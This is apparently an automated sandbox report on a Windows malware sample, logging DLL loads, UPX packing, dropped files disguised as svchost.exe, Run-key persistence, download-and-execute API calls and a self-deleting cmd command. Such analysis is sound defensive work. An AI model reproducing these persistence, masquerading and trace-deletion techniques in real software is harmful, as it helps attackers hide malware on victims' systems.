                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: winrnr.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: appresolver.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: slc.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: sppc.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: dlnashext.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: wpdshext.dll
                Source: C:\Windows\SysWOW64\034031\svchost.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\034031\svchost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\034031\svchost.exeSection loaded: avicap32.dll
                Source: C:\Windows\SysWOW64\034031\svchost.exeSection loaded: msvfw32.dll
                Source: C:\Windows\SysWOW64\034031\svchost.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\034031\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\034031\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\034031\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\034031\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\034031\svchost.exeSection loaded: msvcp60.dll
                Source: C:\Windows\SysWOW64\034031\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\034031\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\SysWOW64\034031\svchost.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: apphelp.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: wininet.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: avicap32.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: msvfw32.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: winmm.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: winmm.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: urlmon.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: iertutil.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: srvcli.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: netutils.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: msvcp60.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: netapi32.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: samcli.dll
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: apphelp.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: wininet.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: avicap32.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: msvfw32.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: winmm.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: winmm.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: urlmon.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: iertutil.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: srvcli.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: netutils.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: msvcp60.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: netapi32.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: samcli.dll
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\Temp\ .exeWindow found: window name: SysTabControl32Jump to behavior
                Source: C:\Windows\Temp\ .exeAutomated click: OK
                Source: C:\Windows\Temp\ .exeAutomated click: OK
                Source: C:\Windows\Temp\ .exeAutomated click: OK
                Source: C:\Windows\Temp\ .exeAutomated click: OK
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\Temp\ .exeWindow detected: Number of UI elements: 96
                Source: Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.0000000002851000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000000.1324754830.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
                Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdbEG source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb4 source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\ntkrnlmp.pdb source: .exe, 00000005.00000002.2705674625.00000000024E0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405CFF
                Source: v5.exe.0.drStatic PE information: section name: UPX2
                Source: C:\Windows\Temp\v5.exeCode function: 2_2_00408FB0 push eax; ret 2_2_00408FDE
                Source: C:\Windows\Temp\server.exeCode function: 3_2_004046E0 push eax; ret 3_2_0040470E
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10069820 push eax; ret 3_2_1006984E
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100FAA45 push edi; ret 3_2_100FAA46
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10025EF1 push cs; ret 3_2_10025EF2
                Source: C:\Windows\Temp\v5.exeCode function: 4_2_00408FB0 push eax; ret 4_2_00408FDE
                Source: C:\Windows\Temp\ .exeCode function: 5_2_004483B0 push eax; ret 5_2_004483CE
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00447450 push eax; ret 5_2_00447464
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00447450 push eax; ret 5_2_0044748C
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00449957 push ecx; ret 5_2_00449967
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_004046E0 push eax; ret 8_2_0040470E
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10069820 push eax; ret 8_2_1006984E
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100FAA45 push edi; ret 8_2_100FAA46
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10025EF1 push cs; ret 8_2_10025EF2
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\SysWOW64\033726\svchost.exeJump to dropped file
                Source: C:\Windows\SysWOW64\033726\svchost.exeFile created: C:\Windows\SysWOW64\034031\svchost.exeJump to dropped file
                Source: C:\Windows\Temp\server.exeExecutable created and started: C:\Windows\SysWOW64\033726\svchost.exeJump to behavior
                Source: C:\Windows\SysWOW64\033726\svchost.exeExecutable created and started: C:\Windows\SysWOW64\034031\svchost.exe
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeExecutable created and started: C:\Windows\temp\server.exeJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeExecutable created and started: C:\Windows\temp\ .exeJump to behavior
                Source: unknownExecutable created and started: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                Source: unknownExecutable created and started: C:\Windows\XXXXXX05CA35CC\svchsot.exe
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeExecutable created and started: C:\Windows\temp\v5.exeJump to behavior
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,3_2_10001A20
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exe
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
                Source: C:\Windows\SysWOW64\033726\svchost.exeFile created: C:\Windows\SysWOW64\034031\RCX8B31.tmpJump to dropped file
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\SysWOW64\033726\svchost.exeJump to dropped file
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\SysWOW64\033726\RCX773C.tmpJump to dropped file
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Windows\Temp\ .exeJump to dropped file
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Windows\Temp\server.exeJump to dropped file
                Source: C:\Windows\SysWOW64\033726\svchost.exeFile created: C:\Windows\SysWOW64\034031\svchost.exeJump to dropped file
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Windows\Temp\v5.exeJump to dropped file
                Source: C:\Windows\SysWOW64\033726\svchost.exeFile created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to dropped file
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\XXXXXX05CA35CC\svchsot.exeJump to dropped file
                Source: C:\Windows\SysWOW64\033726\svchost.exeFile created: C:\Windows\SysWOW64\034031\RCX8B31.tmpJump to dropped file
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\SysWOW64\033726\svchost.exeJump to dropped file
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\SysWOW64\033726\RCX773C.tmpJump to dropped file
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Windows\Temp\ .exeJump to dropped file
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Windows\Temp\server.exeJump to dropped file
                Source: C:\Windows\SysWOW64\033726\svchost.exeFile created: C:\Windows\SysWOW64\034031\svchost.exeJump to dropped file
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Windows\Temp\v5.exeJump to dropped file
                Source: C:\Windows\SysWOW64\033726\svchost.exeFile created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to dropped file
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\XXXXXX05CA35CC\svchsot.exeJump to dropped file
                Source: C:\Windows\Temp\v5.exeCode function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,2_2_0040597D
                Source: C:\Windows\Temp\server.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CCJump to behavior
                Source: C:\Windows\Temp\server.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CCJump to behavior
                Source: C:\Windows\SysWOW64\033726\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw==
                Source: C:\Windows\SysWOW64\033726\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw==

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\Temp\v5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
                Source: C:\Windows\Temp\v5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nulJump to behavior
